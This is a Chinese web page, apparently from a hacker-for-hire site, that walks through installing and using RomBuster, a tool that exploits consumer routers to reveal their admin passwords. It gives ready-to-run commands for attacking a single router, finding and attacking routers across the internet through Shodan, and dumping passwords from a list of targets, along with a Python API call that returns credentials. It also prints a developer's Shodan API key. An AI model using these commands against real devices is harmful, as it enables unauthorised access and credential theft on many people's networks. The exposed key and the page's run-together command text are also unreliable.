如何使用RomBuster获取你的网络路由器密码-黑客24小时在线接单的网站

关于RomBuster

RomBuster是一款功能强大的针对网络路由器的漏洞利用工具，该工具能够帮助广大研究人员对网络路由器的安全性进行分析，并获取目标路由器的管理员密码。

功能介绍

能够利用大多数热门路由器中的安全漏洞，例如D-Link、Zyxel、TP-Link和华为等等。
经过优化处理，可从列表中读取多个目标路由器，并进行安全分析和漏洞利用。
简单的命令行接口和API用法。

工具安装

由于RomBuster使用Python3开发，因此首先需要在本地设备上安装并配置好Python3环境。接下来，广大研究人员可以使用下列命令下载并安装RomBuster：

pip3installgit+https://github.com/EntySec/RomBuster

基础使用

RomBuster的使用非常简单，我们只需要在命令行终端中输入“rombuster”命令即可使用RomBuster：

usage:rombuster[-h][-oOUTPUT][-iINPUT][-aADDRESS][--shodanSHODAN]

[--zoomeyeZOOMEYE][-pPAGES]

RomBusterisarouterexploitationtoolthatallowstodisclosurenetwork

routeradminpassword.

optionalarguments:

-h,--help显示这个帮助信息并退出

-oOUTPUT,--outputOUTPUT

将结果存储至文件

-iINPUT,--inputINPUT

地址列表输入文件

-aADDRESS,--addressADDRESS

提供单个地址

--shodanSHODAN通过网络利用远程设备所使用的ShodanAPI密钥

--zoomeyeZOOMEYE通过网络利用远程设备所使用的ZoomEyeAPI密钥

-pPAGES,--pagesPAGES

需要通过ZoomEye获取的页面数量

工具使用样例

(1) 攻击单个路由器

下列命令可以攻击单个网络路由器：

rombuster-a192.168.99.1

(2) 通过网络攻击远程路由器

接下来，我们可以使用Shodan搜索引擎来搜索并攻击网络上的由器：

rombuster--shodanPSKINdQe1GyxGgecYz2191H2JoS9qvgD

注意：项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥，你可以使用你自己的密钥，当然了你想用开发人员的也没意见，大家资源共享嘛!

(3) 从输入文件获取目标路由器

我们还可以使用开放数据库中提供的摄像头地址：

rombuster-irouters.txt-opasswords.txt

注意：此命令将会攻击routers.txt中给出的所有摄像头，并会将所有获取到的密码存储至passwords.txt文件中。

API使用

RomBuster还提供了自己的Python API，可以将其导入至你们自己的项目代码中并调用其功能：

fromrombusterimportRomBuster

(1) 基础函数

下面给出的是RomBuster支持的基础函数，可以用于利用指定路由器中的安全漏洞：

exploit(address)：攻击指定地址的单个路由器

(2) 调用样例

攻击单个路由器：

fromrombusterimportRomBuster

rombuster=RomBuster()

creds=rombuster.exploit('192.168.99.1')

print(creds)

项目地址

RomBuster：【GitHub传送门】

一	二	三	四	五	六	日
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31